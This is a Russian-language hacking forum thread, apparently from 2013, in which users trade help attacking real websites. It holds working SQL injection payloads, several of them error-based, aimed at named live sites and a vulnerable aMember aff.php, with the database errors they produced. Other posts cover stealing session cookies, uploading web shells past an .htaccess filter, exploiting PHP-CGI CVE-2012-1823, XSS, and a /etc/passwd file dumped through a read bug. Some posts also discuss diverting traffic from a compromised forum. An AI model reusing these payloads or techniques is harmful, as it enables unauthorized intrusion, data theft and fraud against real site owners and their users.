нужна помощь в обходе фильтра на знак '_'

уязвимый код


PHP:
list($y,$m) =split('_',$_GET['year_month']);

$m=sprintf('%02d',$m);

$dat1="{$y}-{$m}-01";

$dat2=date('Y-m-t',strtotime($dat1));

...........

$q=$db->query("SELECT DAYOFMONTH(ac.date), COUNT(commission_id) ,

SUM(IF(record_type='debit', amoun t, 0)),

SUM(IF(record_type='credit', amou nt, 0)),

SUM(IF(record_type='debit', 1, 0 ))

FROM{$db->config[prefix]}aff_commission ac

WHERE aff_id=$member_idAND ac.da te BETWEEN '$dat1' AND '$dat2'

GROUP BY DAYOFMONTH(ac.date)

");

...........



запрос который у меня вышел


?year_month=2013-01-01' and(select 1 from(select count(*),concat(concat(user(),0x3a,version(),0x3a, database()),floor(rand(0)*2))x from(select 1 union select 2 union select 3)z group by x)a) -- _1&action=stats
в ответ получил
MYSQL ERROR:
Duplicate entry 'support_memuser@localhost:5.5.23-55:support_memb1' for key 'group_key'
in query:
SELECT DAYOFMONTH(ac.date), COUNT(commission_id), SUM(IF(record_type='debit', amount, 0)), SUM(IF(record_type='credit', amount, 0)), SUM(IF(record_type='debit', 1, 0)) FROM amember_aff_commission ac WHERE aff_id=4753 AND ac.date BETWEEN '2013-01-01' AND '1969-12-31' and(select 1 from(select count(*),concat(concat(user(),0x3a,version(),0x3a, database()),floor(rand(0)*2))x from(select 1 union select 2 union select 3)z group by x)a) -- -01-01' AND '1969-12-31' GROUP BY DAYOFMONTH(ac.date)




?year_month=2013-01-01' and(select 1 from(select count(*),concat((select login from
member_admins
limit 0,1),floor(rand(0)*2))x from(select 1 union select 2 union select 3)z group by x)a) -- _1&action=stats
ну и в ответ соответственно
MYSQL ERROR:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-00-01' AND '1969-12-31' GROUP BY DAYOFMONTH(ac.date)' at line 6
in query:
SELECT DAYOFMONTH(ac.date), COUNT(commission_id), SUM(IF(record_type='debit', amount, 0)), SUM(IF(record_type='credit', amount, 0)), SUM(IF(record_type='debit', 1, 0)) FROM amember_aff_commission ac WHERE aff_id=4753 AND ac.date BETWEEN '2013-01-01' AND '1969-12-31' and(select 1 from(select count(*),concat((select login
from member-00-01' AND '1969-12-31' GROUP BY DAYOFMONTH(ac.date)



можно ли каким то образом обойти такой фильтр???

зашифровать?

чтото типа


Code:
SELECT * FROM (SELECT 0x7461626c655f6e616d65) AS t2

да и к стати это уязвимость в aMember 3.0.8 PRO в фаиле aff.php

привет всем !
нужна помощь в обходе фильтра на знак '_'


select login from member_admins

select login from member%5fadmins

select login from member%255fadmins

SQLMAP

SQL-иньекция определила, что dbms - Microsoft Access! Но имя ее не может вытащить! Если пытаться посмотреть список таблиц то у всех название _fil! Кто сталкивался с такой проблемой? НУЖНА ПОМОЩЬ! Скрины прилагаются

http://s6.hostingkartinok.com/uploads/images/2013/04/74b07c289156cb356aeddd6dd9ae0b70.jpg

http://s6.hostingkartinok.com/uploads/images/2013/04/44545d02d42956d96338e721573d1e6b.jpg

http://s6.hostingkartinok.com/uploads/images/2013/04/6d7db64574ce2d23f2ceddb5b59ce0c1.jpg

BigBear said:
select login from member_admins
select login from member%5fadmins
select login from member%255fadmins


тут это не поможет так %5f при обработке превращается в '_' и


PHP:
list($y,$m) =split('_',$vars['year_month']);

его рубит

надо ка кто выполнить запрос вообще без этого знака

SaliVan said:
тут это не поможет так %5f при обработке превращается в '_' и

PHP:
list($y,$m) =split('_',$vars['year_month']);

его рубит
надо ка кто выполнить запрос вообще без этого знака


второй вариант пробовал?

Можно ли как-то через веб-шелл ходить по удаленным ресурсам винды типа \\10.32.0.236?

BigBear said:
второй вариант пробовал?


да не чего даже пробовать этот символ "_" не должен присутствовать в запросе.

надо както зашифровать названия таблицы

Не смотря на количество выкуреных мануалов по кукам, остались у меня еще некоторые вопросы которые хотел бы уточнить.

1) Первый и самый главный: хранится всетаки или нет в кукисах пароль? Одни говорят одно другие другое. Как я понял он в них может хранится в зашифрованном виде и раньше так и было в основном, сейчас же используется идентификатор сессии а сам пароль передается только при авторизации. Поправьте если что не так.

2) Как влияет смена ип на сессию? Насколько я понял если стоит привязка к ип то выкинет обратно на страницу авторизации если заходиш с другого компа?

3) Что будет если ты допустим перехватил постоянные куки или куки которым жить отведено долго достаточно, но юзер авторизовался заново? Перехваченые куки становятся бесполезными и принимать их уже не будет?

4) Можно ли зайти одновременно с 2х компов с одним куки если ип один и тот же (компы одной сети), и если ип разный?

попугай said:
Можно ли как-то через веб-шелл ходить по удаленным ресурсам винды типа \\10.32.0.236?


можно через гейт воланда тыц (http://wonted.ru/programms/vpsproxy/)

Нашел пассивную XSS уязвимость в форме регистрации, то есть ввести


Code:
alert("!")

скрипт выпоняется. Вся проблема в том что нельзя из этого сделать ссылку и кинуть админу чтобы забрать его куки. Есть еще другие методы чтобы раскрутить это дело?

not_bad said:
Не смотря на количество выкуреных мануалов по кукам, остались у меня еще некоторые вопросы которые хотел бы уточнить.
1) Первый и самый главный: хранится всетаки или нет в кукисах пароль? Одни говорят одно другие другое. Как я понял он в них может хранится в зашифрованном виде и раньше так и было в основном, сейчас же используется идентификатор сессии а сам пароль передается только при авторизации. Поправьте если что не так.
2) Как влияет смена ип на сессию? Насколько я понял если стоит привязка к ип то выкинет обратно на страницу авторизации если заходиш с другого компа?
3) Что будет если ты допустим перехватил постоянные куки или куки которым жить отведено долго достаточно, но юзер авторизовался заново? Перехваченые куки становятся бесполезными и принимать их уже не будет?
4) Можно ли зайти одновременно с 2х компов с одним куки если ип один и тот же (компы одной сети), и если ип разный?


может быть и так и так, все по рзному скрипты пишут


vova1609 said:
Нашел пассивную XSS уязвимость в форме регистрации, то есть ввести

Code:
alert("!")

скрипт выпоняется. Вся проблема в том что нельзя из этого сделать ссылку и кинуть админу чтобы забрать его куки. Есть еще другие методы чтобы раскрутить это дело?


нет нету

qaz said:
может быть и так и так, все по разному скрипты пишут


А поподробнее можно пожалуйста?

vova1609 said:
Нашел пассивную XSS уязвимость в форме регистрации, то есть ввести

Code:
alert("!")

скрипт выпоняется. Вся проблема в том что нельзя из этого сделать ссылку и кинуть админу чтобы забрать его куки. Есть еще другие методы чтобы раскрутить это дело?


Можно попробовать проверить наличие CSRF в форме, если она отображается для залогиненых пользователей.

not_bad said:
Не смотря на количество выкуреных мануалов по кукам, остались у меня еще некоторые вопросы которые хотел бы уточнить.
1) Первый и самый главный: хранится всетаки или нет в кукисах пароль? Одни говорят одно другие другое. Как я понял он в них может хранится в зашифрованном виде и раньше так и было в основном, сейчас же используется идентификатор сессии а сам пароль передается только при авторизации. Поправьте если что не так.
2) Как влияет смена ип на сессию? Насколько я понял если стоит привязка к ип то выкинет обратно на страницу авторизации если заходиш с другого компа?
3) Что будет если ты допустим перехватил постоянные куки или куки которым жить отведено долго достаточно, но юзер авторизовался заново? Перехваченые куки становятся бесполезными и принимать их уже не будет?
4) Можно ли зайти одновременно с 2х компов с одним куки если ип один и тот же (компы одной сети), и если ип разный?


Хотябы 3 и 4 вопрос поясните плз. Если может быть по разному то как узнать как конкретно на данном сайте делается? Эта информация заложена в самих куках или только на самом сайте? Чтобы не попасть в ситуацию что перехватил куки а через день они уже не работают. Спасибо.

not_bad said:
Хотябы 3 и 4 вопрос поясните плз. Если может быть по разному то как узнать как конкретно на данном сайте делается? Эта информация заложена в самих куках или только на самом сайте? Чтобы не попасть в ситуацию что перехватил куки а через день они уже не работают. Спасибо.


берешь и проверяешь. все зависит от того как устроен сам двиг.

Почему не выводятся принтабельные поля?

http://www.aviation.su/index.php?op=modload&mod=News&na=details&id=798+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13, 14,15,16,17,18,19,20+--+

Улыбайся said:
Почему не выводятся принтабельные поля?
http://www.aviation.su/index.php?op=modload&mod=News&na=details&id=798+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13, 14,15,16,17,18,19,20+--+




http://www.aviation.su/index.php?op=modload&mod=News&na=details&id=798+or+(select+count(*)+from+(select+1+union+se lect+2+union+select+3)x+group+by+concat(version(), floor(rand(0)*2)))--


5.0.51a-24+lenny5

er9j6@ said:
Как в webasyst залить шелл?
Вариант с не проходит


?

мож, нет прав на запись файлов в этот каталог, мож allow_url_fopen off

smirk said:
?
мож, нет прав на запись файлов в этот каталог, мож allow_url_fopen off


copy(shellurl,ПОЛНЫЙ АДРЕС)

Подскажите, плизз программу для подбора паролей, зашифрованных алгоритмом varbinary(256), желательно, с использованием CUDA, Google не помог..... Почему-то

zloy_fantom said:
Подскажите, плизз программу для подбора паролей, зашифрованных алгоритмом varbinary(256), желательно, с использованием CUDA, Google не помог..... Почему-то


Varbinary это разве хэш, а не бинарная форма записи?

not_bad said:
Хотябы 3 и 4 вопрос поясните плз. Если может быть по разному то как узнать как конкретно на данном сайте делается? Эта информация заложена в самих куках или только на самом сайте? Чтобы не попасть в ситуацию что перехватил куки а через день они уже не работают. Спасибо.


1. пароли в кукисах давно никто не хранит. максимум хеш пароля, но чаще id сессии. так что ты прав.

2. в том же mail.ru никак не влияет. вк и прочие тоже.. вообще из общепопулярных ресурсов не встречал пока что бы обрывал сессию из-за смены ip. хотя конечно такое возможно. но может для корпоративных ресурсов с хорошим уровнем безопасности.

3. если юзер авторизовался заново, старая сессия была закрыта, то тебя нужно будет по новой тырить куки. мой тебе совет, потырил куки от почты, получил сессию, быстро ищешь что есть в почте из паролей, весьма вероятно что один из найденых подойдет и от ящика.

4. зайти можно. можно даже зайти с разных компов. но опять же это специфически, зависит от ресурса.

мне кажется я только что изобрел велосипед, но хотелось бы пояснений от людей знающих!

В общем суть такова:

1. Поднимаем proxy на своей машине/сервере

2. Формируем ссылку на атакуемый ресурс «site-name» через данный proxy. т.е. ссылка вида http://proxyort/http://site-name

3. Отправляем ссылку жертве

Получается вполне классический вариант атаки мэн-ин-дэ-мидл. ресурс откроется у жертвы, но через нашу проксю.

При этом важный момент, жертва уже залогинина на «site-name» у себя в браузере. Т.е. у браузера в куках есть ID сессии.

Жертва переходит по ссылке, браузер послушно передает куки на «site-name», но трафик то идет через наш proxy и мы можем с легкостью поваровать сессию.

Вроде как profit.

При этом думаю стоит различить варианты proxy:

1. Web-proxy

2. http\https proxy

3. ssl proxy

в общем хотелось бы услышать мнение, возможна ли такая атака?

Если возможна где можно почитать в подробностях.

Основной момент что жертве не надо логинится на сайт, если она уже на сайте. Это дает нам возможность спрятать «site-name» в невидимом iframe, а жертве показать картинку с котиком. Но куки то передадуться все равно, даже если сайт не виден.

Я заранее извиняюсь, но нагуглить хоть что-то похожее у меня не вышло. Видел что-то похожее в BackTrack, но там была эмуляция сайта(SeT), и надо было заставить жертву ввести логин и пароль, а в описанном мной случае мы можем получить сессию не вызывав серьезных подозрений. ну кроме странного урла конечно ) что в принципе решаемо.

Hracid said:
мне кажется я только что изобрел велосипед, но хотелось бы пояснений от людей знающих!
В общем суть такова:
1. Поднимаем proxy на своей машине/сервере
2. Формируем ссылку на атакуемый ресурс «site-name» через данный proxy. т.е. ссылка вида http://proxy
ort/http://site-name
3. Отправляем ссылку жертве
Получается вполне классический вариант атаки мэн-ин-дэ-мидл. ресурс откроется у жертвы, но через нашу проксю.
При этом важный момент, жертва уже залогинина на «site-name» у себя в браузере. Т.е. у браузера в куках есть ID сессии.
Жертва переходит по ссылке, браузер послушно передает куки на «site-name», но трафик то идет через наш proxy и мы можем с легкостью поваровать сессию.
Вроде как profit.
При этом думаю стоит различить варианты proxy:
1. Web-proxy
2. http\https proxy
3. ssl proxy
в общем хотелось бы услышать мнение, возможна ли такая атака?
Если возможна где можно почитать в подробностях.
Основной момент что жертве не надо логинится на сайт, если она уже на сайте. Это дает нам возможность спрятать «site-name» в невидимом iframe, а жертве показать картинку с котиком. Но куки то передадуться все равно, даже если сайт не виден.
Я заранее извиняюсь, но нагуглить хоть что-то похожее у меня не вышло. Видел что-то похожее в BackTrack, но там была эмуляция сайта(SeT), и надо было заставить жертву ввести логин и пароль, а в описанном мной случае мы можем получить сессию не вызывав серьезных подозрений. ну кроме странного урла конечно ) что в принципе решаемо.


Куки шлются только на домен, установивший их, поэтому провал.

Да и


2. Формируем ссылку на атакуемый ресурс «site-name» через данный proxy. т.е. ссылка вида http://proxyort/http://site-name


Это как? Ты сам пробовал это? У меня не работает - 502 Bad gateway. Прокси, конечно же, рабочий, если его в браузере прописывать.

XAMEHA said:
Varbinary это разве хэш, а не бинарная форма записи?


Насколько я понял, обратное преобразование невозможно, только брут, но не могу найти брутер, поддерживающий эту функцию

попугай said:
Куки шлются только на домен, установивший их, поэтому провал.
Да и
Это как? Ты сам пробовал это? У меня не работает - 502 Bad gateway. Прокси, конечно же, рабочий, если его в браузере прописывать.


где-то на ачате видел тему что именно так в адресной строке можно прописать проксю, должным образом сконфигурированную. и даже цепочку из проксей.

а вот по поводу домена это да. видимо не получится. спасибо за ответ! об этом я как-то не подумал, мой багаж знаний к сожалению не велик.

Xeson said:
Проблема появилась, загрузил шелл на сайт,
site.com/shell.php, перехожу по адресу, появляется шелл, обновляю страницу, ошибка 404, нет шелла, опять обновляю страницу, шелл появился, обновляю, нету. Что это за херня?


возможно сайт на нескольких ip адресах, грузится рандомно, это делается для уменшения нагрузки. попробуйте открыть шелл через ip адрес, а не через доменное имя

Xeson said:
Нет, это не помогает, все то же самое. Что это за цирк?


если 404 появляется во время сабмита пароля (wso) то возможно это waf какой то, попробуйте загрузить другой шелл, или любой скрипт, анализируйте поведение сервера на разные файлы

Xeson said:
Нет, это не помогает, все то же самое. Что это за цирк?


Казино, да ?)

Если да - то там как раз несколько IP адресов, и пара из них даже дадут тебе рута)

Не плодите еретические мысли господа. Что за сайт для начала? Если это высоконагруженный проект - глянь какие IP привязаны к базовому домену. Если несколько штук и они обслуживают одно БАЗОВОЕ доменное имя - лезь в ГУГЛ и читай что такое масштабирование по принципу кластерной системы. Совершенно банальный случай для хайлоад проектов. К примеру облачные решения несмотря на свою распределенность совершенно прозрачны для клиента, хотя и тут все зависит от реализации. Тоесть залил ты шелл либо картинку - у тебя не будет фокусов подобных наблюдаемым. А вот когда имеет место кластер, то как раз и кидает тебя с одного IP на другой. С личной практики могу посоветовать искать директории которые прописаны в балансировщике как статичные, тоесть например есть условие для обработки PHP(допустим в этом случае и всех остальных) файлов(условий) - это условие общее. Но для частных типов файлов или же в каких то конкретных директориях - например директория заливки аватаров может иметь статичную адресацию и не балансироваться по кластеру или например filepath может браться с этой статичной директории а на обработку тому же FASTCGI уже на другой какой IP.

dle галерея. скуля в сортировке.


SELECT * FROM dle_gal_cat WHERE cat_status='0' AND (cat_view_level = '0' OR cat_view_level regexp '[[::]]') AND pid='0' ORDER BY cat_title ASC
SQL_INJ
LIMIT 0, 20


кавычка экранируется слешем. помогите раскрутить?)

форум дле поиск по топику


SELECT p.*, u.* FROM dle_forum_posts AS p LEFT JOIN dle_users AS u ON p.post_author=u.name WHERE p.topic_id = '110' AND post_text LIKE '%
SQL INJ
%' ORDER by pid LIMIT 0,20


тут ничего не фильтруется

http://odnadoma.ru/?part_id=500 ORDER BY 10 -- TRUE

http://odnadoma.ru/?part_id=500 ORDER BY 1 -- FALSE

http://odnadoma.ru/?part_id=500 UNION SELECT 1 -- ОТСОС

В ЧЕМ ПРОБЛЕМА?

Такой вопосец

.htaccess не пропускает файлы с таким разширением

(tpl\.html|php|php3|php4|php5|phtml|pl|cgi)

мб есть какиенибуть разширения исполняющие php код?

qaz said:
Такой вопосец
.htaccess не пропускает файлы с таким разширением
(tpl\.html|php|php3|php4|php5|phtml|pl|cgi)
мб есть какиенибуть разширения исполняющие php код?


злей shtml

justonline said:
злей shtml


php не выполняет

qaz said:
Такой вопосец
.htaccess не пропускает файлы с таким разширением
(tpl\.html|php|php3|php4|php5|phtml|pl|cgi)
мб есть какиенибуть разширения исполняющие php код?


shtml, py


qaz said:
php не выполняет


http://ahack.ru/releases/ssi-web-shell.htm

Always said:
http://odnadoma.ru/?part_id=500 ORDER BY 10 -- TRUE
http://odnadoma.ru/?part_id=500 ORDER BY 1 -- FALSE
http://odnadoma.ru/?part_id=500 UNION SELECT 1 -- ОТСОС
В ЧЕМ ПРОБЛЕМА?


Просто нет вывода

http://odnadoma.ru/?part_id=500+and+1=2+union+select+unhex(hex(123))+--+

UPD. Тут WAF прикольный кстати )

Фильтруются запятые, учти это.

Можно как-то раскрутить такую XSS


Code:
…

В XSSHERE можно вставлять код, "/{} экранируется, ();' не экранируется.

нашел в плагинах браузера уязвимости через спецальный тул но не знаю как их выъявить.

сервис показывает что есть 2 уязвимости но не говорит в каких. даже если нашел в каких, как можно найти где уязвимость?

пс. как найти уязвимость в программном коде?

semolod91 said:
нашел в плагинах браузера уязвимости через спецальный тул но не знаю как их выъявить.
сервис показывает что есть 2 уязвимости но не говорит в каких. даже если нашел в каких, как можно найти где уязвимость?
пс. как найти уязвимость в программном коде?


Линки в студию.

Разобрался

Есть уязвимость типа

blog.php?id=1+OR (SELECT COUNT(*) FROM (SELECT 1 UNION SELECT 2 UNION SELECT 3)x GROUP BY CONCAT(MID(user(), 1, 63), FLOOR(RAND(0)*2))) --

ответ:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 6

нет вывода user(), что делать?

Как раскрутить?

Sanic1977 said:
Есть уязвимость типа
blog.php?id=1+union+select+1,user()+--+
ответ:
SELECT ... FROM utils.post WHERE 1=1 AND id IN (1 union select 1) ORDER BY date DESC - mysql problem - conn id : Resource id #44
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'union select 1) ORDER BY date DESC' at line 6
Как раскрутить?


blog.php?id=1)+union+select+1,user()+--+

Спасибо, за помощь

Пишу в уязвимости:

blog.php?id=25628)and(select 1 from(select count(*),concat(concat(user()),floor(rand(0)*2))x from(select 1 union select 2 union select 3)z group by x)a) --

ответ:

Every derived table must have its own alias

что это может быть?

как раскрутить?

В общем есть root phmyadm с file_priv, есть phpinfo. Папок с правами на запись не нашел, какие есть варианты кроме как искать lfi?

Имеется MySQL5 инъекция, мускул крутится на Win server 2008. Веб сервак - 80/tcp open http Microsoft IIS httpd 7.0.

file_priv=y, но кавычки не пролазят.

PHP - 5.2.17 (старый)

В нем есть этот баг: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-0831

Тоесть можно отключить MQ? Если да - можно попробовать записать файл.

Есть варианты залится?

Еще удалось прочитать исходник:

admin/index.php


PHP:




" />

[/COLOR]styles.css" media="screen" />

[/COLOR]1x1.gif" width='1px' height='300px'>

Project Manager

[/COLOR]index.php' method="POST">

User:

Password:

[/COLOR]

Мне почему-то кажется, что он уязвим, не?

И ещё туда же:

http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-1823

5.2.17 - уязвим.


when configured as a CGI script (aka php-cgi), does not properly handle query strings that lack an = (equals sign) character, which allows remote attackers to execute arbitrary code by placing command-line options in the query string, related to lack of skipping a certain php_getopt for the 'd' case.


в phpinfo()


Server API CGI/FastCGI


index.php?-s ничего не изменило. вай?

Спасибо.

Dr.D0z1k - например, пропатчено =/

Подскажите на какую партнёрку лучше сливать траф?Можна в личку.

Sat-hacker said:
Подскажите на какую партнёрку лучше сливать траф?Можна в личку.


этот вопрос не имеет никакого отношения к теме

есть инъекция

так работает нормально

?menu=95&add=50110339+and+1=0+union+select+1,table_name,3,4 ,5,6,7,8+from+information_schema.tables+--+

названия таблиц выводятся в столбик, есть таблица accounts,но я не могу вывести названия столбцов. Вывод ошибки тут отсутствует

пробовал так:

?menu=95&add=50110339+and+1=0+union+select+1,column_name,3, 4,5,6,7,8+from+information_schema.columns+where+ta ble_name='accounts'+--+

не выходит

а так выводится огромное кол-во столбцов:

?menu=95&add=50110339+and+1=0+union+select+1,column_name,3, 4,5,6,7,8+from+information_schema.columns+--+

как мне вывести именно accounts?

пробовал в hex переводить, кавычки ставить/убирать, не получается

LomasterII said:
есть инъекция
так работает нормально
?menu=95&add=50110339+and+1=0+union+select+1,table_name,3,4 ,5,6,7,8+from+information_schema.tables+--+
названия таблиц выводятся в столбик, есть таблица accounts,но я не могу вывести названия столбцов. Вывод ошибки тут отсутствует
пробовал так:
?menu=95&add=50110339+and+1=0+union+select+1,column_name,3, 4,5,6,7,8+from+information_schema.columns+where+ta ble_name='accounts'+--+
не выходит
а так выводится огромное кол-во столбцов:
?menu=95&add=50110339+and+1=0+union+select+1,column_name,3, 4,5,6,7,8+from+information_schema.columns+--+
как мне вывести именно accounts?
пробовал в hex переводить, кавычки ставить/убирать, не получается


Скорее всего у вас MQ включены.

Следовательно, надо использовать запросы вида

menu=95&add=50110339+and+1=0+union+select+1,column_name,3, 4,5,6,7,8+from+information_schema.columns+where+ta ble_name=0x6163636f756e7473+--+

Спасибо!

Люди помогите раскрутить или подскажите в какую сторону крутить postgresql , при post запросе :

login=1%27%22

выкидывает ошибку :

Warning: pg_query() [function.pg-query]: Query failed: ÎØÈÁÊÀ: îøèáêà ñèíòàêñèñà (ïðèìåðíîå ïîëîæåíèå: "\&quot

LINE 1: ...SR_PASS" FROM main."RTH_WEBUSRS" WHERE "WEBUSR_NAME"='1\'\"'

^ in C:\Program Files (x86)\Apache Software Foundation\Apache2.2\htdocs\ххх\login.php on line 25

а дальше не получается ничего

такой вопросец, есть скуля, выводит только числовой резултат, если в выводе есть буквы или знаки то показывает ошибку, нехочется пол дня крутить как блинд, может есть каккие ни будь функции в mysql чтобы перевести строку в числовой вид(например ascii() толтко не символ а всю строку нужно )

чтобы потом можно было легко переобразовать обратно?

qaz said:
такой вопросец, есть скуля, выводит только числовой резултат, если в выводе есть буквы или знаки то показывает ошибку, нехочется пол дня крутить как блинд, может есть каккие ни будь функции в mysql чтобы перевести строку в числовой вид(например ascii() толтко не символ а всю строку нужно )
чтобы потом можно было легко переобразовать обратно?


Char не?

blesse said:
Char не?


не, лан, спасиб,уже не нужно, скрипт для блинда написал

если например я на сайте нашел поле для ввода даты и там select начиная от 1900 до 2000, если я подменю это значение через html код на 7777 и отправлю результат, и в базу сохранится он, если результат примется и пройдёт - как это называется? - это sql инъекция ?

GAiN said:
если например я на сайте нашел поле для ввода даты и там select начиная от 1900 до 2000, если я подменю это значение через html код на 7777 и отправлю результат, и в базу сохранится он, если результат примется и пройдёт - как это называется? - это sql инъекция ?


Скуль инъект - это когда выполняются запросы sql которые ты вводишь. Если запросы не выполняются, то это уже не скуль инъект. Мб xss... Все зависит от фильрации символов и где они выводятся.

Имееться шел на форуме vbulletin, интересует слив трафа с сайта через поисковик на партнёрку,как можна реализовать?

Sat-hacker said:
Имееться шел на форуме vbulletin, интересует слив трафа с сайта через поисковик на партнёрку,как можна реализовать?


написать скрипт, опять же не имеет никакого отношения к теме

Слышал что можна как-то через iframe сливать траф,не подскажите как?

пришедших с поисковых систем кидать на партнёрку.

OxoTnik а что делает этот фрейм?

Понял,и на этом большое спасибо за помощь.

Вопрос по sqli

Всем доброго времени суток. А можно просветить неофита? Скуль однако...

Вбиваем в поисковую форму

1'

Получаем

По вашему запросу 1\' ничего не найдено

Понятно, ' экранируется

Вбиваем

1"

Получаем

По вашему запросу 1\

Ну много чего там найдено, т.е. как то запрос обработан (хз чего там оно искало, 1 ?)

Хорошо,

1"'

По вашему запросу 1\

ничего не найдено

уже не понимаю, экран сработал, но почему разный результат?

Ну и

1'"

А вот тут полный компрес

Ошибка при обращении к БД: 1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' OR `t`.`page`='http://www.bogomerzko.com/search/?query=1'%22' ) AND `t`.`lang`=' at line 1

SELECT `t`.`title`, `t`.`text`, `t`.`keywords`, `t`.`description` FROM `titler` `t` WHERE ( `t`.`page`='/search/?query=1'%22' OR `t`.`page`='http://www.bogomerzko.com/search/?query=1'%22' ) AND `t`.`lang`='1' ORDER BY `t`.`page` DESC LIMIT 1

А как мну дальше? Что обозначает срабатывание на '" ?

ingoon said:
Всем доброго времени суток. А можно просветить неофита? Скуль однако...
Вбиваем в поисковую форму
1'
Получаем
По вашему запросу 1\' ничего не найдено
Понятно, ' экранируется
Вбиваем
1"
Получаем
По вашему запросу 1\
Ну много чего там найдено, т.е. как то запрос обработан (хз чего там оно искало, 1 ?)
Хорошо,
1"'
По вашему запросу 1\
ничего не найдено
уже не понимаю, экран сработал, но почему разный результат?
Ну и
1'"
А вот тут полный компрес
Ошибка при обращении к БД: 1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' OR `t`.`page`='http://www.bogomerzko.com/search/?query=1'%22' ) AND `t`.`lang`=' at line 1
SELECT `t`.`title`, `t`.`text`, `t`.`keywords`, `t`.`description` FROM `titler` `t` WHERE ( `t`.`page`='/search/?query=1'%22' OR `t`.`page`='http://www.bogomerzko.com/search/?query=1'%22' ) AND `t`.`lang`='1' ORDER BY `t`.`page` DESC LIMIT 1
А как мну дальше? Что обозначает срабатывание на '" ?


пробуй юзать как в последнем варианте:

1'"+union+select+...+--+

ну или для начала проверь

1'"+--+

ошибки не должно быть.

а так больше ничего сказать не могу

у меня вопрос

значит есть сайт, на нем есть поиск.

вбиваю в поиск 1, в результатах выводятся все статьи, содержащие цифру 1

вбиваю 35332563567, результат - "ничего не найдено"

вбиваю qwerty, результат " DB query error. Please try later."

а если вбить 'qwerty', то пишет как во втором варианте "ничего не найдено"

пробовал еще 1+--+ или 1#, выводит DB query...

а для 1/* результат как для 1

как мне дальше быть?

если есть кто хорошо понимает, могу в личку сайт скинуть

LomasterII said:
у меня вопрос
значит есть сайт, на нем есть поиск.
вбиваю в поиск 1, в результатах выводятся все статьи, содержащие цифру 1
вбиваю 35332563567, результат - "ничего не найдено"
вбиваю qwerty, результат " DB query error. Please try later."
а если вбить 'qwerty', то пишет как во втором варианте "ничего не найдено"
пробовал еще 1+--+ или 1#, выводит DB query...
а для 1/* результат как для 1
как мне дальше быть?
если есть кто хорошо понимает, могу в личку сайт скинуть


Кидай посмотрю!

вот например инъекция

www.bgci.org/garden.php?id=787'+and+1=0+union+select+1,2,3,user (),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,2 2,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38, 39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55 ,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,7 2,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88, 89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,1 04,105,106,107,108,109,110,111,112,113,114,115,116 ,117,118,119,120,121,122,123,124,125,126,127,128,1 29,130,131,132,133,134,135+--+

не другого выхода чтоб вывести информацию? а то 135 полей это слишком

LomasterII said:
вот например инъекция
www.bgci.org/garden.php?id=787'+and+1=0+union+select+1,2,3,user (),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,2 2,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38, 39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55 ,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,7 2,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88, 89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,1 04,105,106,107,108,109,110,111,112,113,114,115,116 ,117,118,119,120,121,122,123,124,125,126,127,128,1 29,130,131,132,133,134,135+--+
не другого выхода чтоб вывести информацию? а то 135 полей это слишком


Либо блайндом, либо error-based. Последний вариант в твоём случае отпадает.

Текущее время: 02:21. Часовой пояс GMT.

Powered by vBulletin® Version 4.2.0

Copyright © 2013 vBulletin Solutions, Inc. All rights reserved.

Перевод: zCarot

кто знает что за нулл?

Как заливать шелл?

Где дырки?

обсуждалось? тогда сорри жду ссылку

есть сайт один:

так идет пустая страница

http://site/?pay_system_id=1

а так ошибка

http://site/?pay_system_id=1'

ORA-06502: PL/SQL: numeric or value error: character to number conversion error

это инъекция? никогда не сталкивался с оракл

LomasterII said:
есть сайт один:
так идет пустая страница
http://site/?pay_system_id=1
а так ошибка
http://site/?pay_system_id=1'
ORA-06502: PL/SQL: numeric or value error: character to number conversion error
это инъекция? никогда не сталкивался с оракл


Не, это не инъекция. Скорее всего ошибка с типом данных у разработчика.

На возможную инъекцию могут указывать следующие коды ошибок: ORA-00933, ORA-01756, ORA-00923 .

Имею читалку.

Есть ли способы найти пути до сайта?

В /etc/passwd простыня:


Code:
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
........
u1724698:x:505:503::/var/www/u1724698:/bin/false
u1725105:x:508:505::/var/www/u1725105:/bin/false
u1725703:x:514:511::/var/www/u1725703:/bin/bash
u1725757:x:515:512::/var/www/u1725757:/bin/false
u1726055:x:517:514::/var/www/u1726055:/bin/bash
u1726273:x:518:515::/var/www/u1726273:/bin/false
u1726588:x:519:516::/var/www/u1726588:/bin/bash
u1727690:x:525:522::/var/www/u1727690:/bin/false
u1727944:x:526:523::/var/www/u1727944:/bin/bash
u1728689:x:529:526::/var/www/u1728689:/bin/bash
u1730438:x:540:537::/var/www/u1730438:/bin/false
u1730873:x:541:538::/var/www/u1730873:/bin/bash
u1731459:x:542:539::/var/www/u1731459:/bin/false
u1732269:x:545:542::/var/www/u1732269:/bin/bash
u1732843:x:558:555::/var/www/u1732843:/bin/bash
u1736727:x:568:565::/var/www/u1736727:/bin/false
u1733648:x:571:568::/var/www/u1733648:/bin/bash
